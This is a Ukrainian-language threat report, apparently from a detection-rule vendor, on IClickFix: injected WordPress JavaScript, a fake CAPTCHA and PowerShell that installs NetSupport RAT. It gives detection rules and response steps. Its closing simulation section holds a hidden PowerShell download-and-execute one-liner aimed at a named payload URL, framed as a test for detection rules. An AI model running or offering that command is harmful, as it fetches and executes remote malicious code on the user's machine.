SOC Prime Bias: Середній

03 Feb 2026 18:25 UTC

Знайомтесь з IClickFix: Широковживана структура для атак на WordPress, що використовує тактику ClickFix

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Знайомтесь з IClickFix: Широковживана структура для атак на WordPress, що використовує тактику ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

У звіті описано IClickFix, зловмисний JavaScript-фреймворк, який компрометує сайти WordPress і представляє підроблений CAPTCHA в стилі Cloudflare Turnstile. Приманка змушує відвідувачів виконати команду PowerShell, яка завантажує та встановлює NetSupport RAT. Доставка підтримується системою розподілу трафіку, побудованою навколо скорочувача URL YOURLS і набору ротаційних доменів-переходів. Дослідники виявили понад 3800 компрометованих сайтів WordPress, які обслуговують цей ланцюг глобально з кінця 2024 року.

Розслідування

Аналітики Sekoia ідентифікували впроваджений JavaScript-тег ic-tracker-js на компрометованих сайтах, а потім відновили потік переадресації через кілька короткочасних доменів. Вони захопили точну модель виконання PowerShell, що використовувалася для отримання кінцевого навантаження і відновили скинуті компоненти NetSupport RAT разом із відповідними індикаторами інфраструктури C2.

Захист

Контролюйте веб-контент на предмет ic-tracker-js інєкцій та блокуйте відомі зловмисні домени, ре-даректори й сервіси коротких посилань, які використовуються в ланцюзі. На кінцевих точках знайдіть шаблони завантаження та виконання PowerShell, що збігаються з приманкою ClickFix. Додайте покриття для створення файлів клієнта NetSupport і стійкість через користувацькі Run ключі реєстру.

Відповідь

Коли з’являються індикатори, ізолюйте кінцеву точку, зупиніть активний процес PowerShell і видаліть бінарні файли NetSupport разом із будь-якою стійкістю на основі реєстру. Далі проведіть повний судовий аналіз, щоб підтвердити, що атакуючий не розгорнув додаткові імпланти або не встановив вторинні шляхи доступу.

Потік атаки

Виявлення

Завантаження або завантаження через Powershell (через cmdline)

Команда SOC Prime
02 лютого 2026

Підозрілі файли в загальному профілі користувача (через file_event)

Команда SOC Prime
02 лютого 2026

Можливість виконання через приховані командні рядки PowerShell (через cmdline)

Команда SOC Prime
02 лютого 2026

Підозріле використання Invoke-RestMethod (через powershell)

Команда SOC Prime
02 лютого 2026

Можлива спроба виконання бінарного файлу NetSupport Manager з підозрілого каталогу (через process_creation)

Команда SOC Prime
02 лютого 2026

Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через registry_event)

Команда SOC Prime
02 лютого 2026

IOC (HashSha256) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix

Правила SOC Prime AI
02 лютого 2026

IOC (DestinationIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix

Правила SOC Prime AI
02 лютого 2026

IOC (SourceIP) для виявлення: Зустрічайте IClickFix: широко поширений фреймворк, націлений на WordPress, використовує тактику ClickFix

Правила SOC Prime AI
02 лютого 2026

Виявлення ін’єкції шкідливого JavaScript IClickFix [Вебсервер]

Правила SOC Prime AI
02 лютого 2026

Виконання команд PowerShell для доставки NetSupport RAT [Windows Powershell]

Правила SOC Prime AI
02 лютого 2026

Імітаційне виконання

Необхідна умова: Перевірка телеметрії й попереднього завантаження базових даних повинна пройдено.

  • Оповідь про атаку та команди:

    Противник, що отримав початковий доступ до кінцевої точки, хоче встановити постійний доступ шляхом доставки NetSupport RAT. Щоб уникнути інтерактивного виявлення, вони запускають PowerShell у прихованому режимі без профілю або логотипу (-w hidden -nop -c). Потім вони використовують Invoke-WebRequest (iwr) для завантаження шкідливого JSON-навантаження (tytuy.json), який містить сценарій PowerShell для RAT. Сценарій записується до тимчасового каталогу і виконується через Invoke-Expression. Ця точна командна лінія відповідає рядкам, які моніторить правило Sigma.

  • Тестовий сценарій рецидиву:

    # PowerShell однолінійний сценарій, який відповідає правилу виявлення
    $url = 'https://scottvmorton.com/tytuy.json'
    $out = "$env:TEMPpayload.ps1"
    
    powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"
  • Команди очищення:

    # Видалити завантажене навантаження та будь-які залишкові процеси PowerShell
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force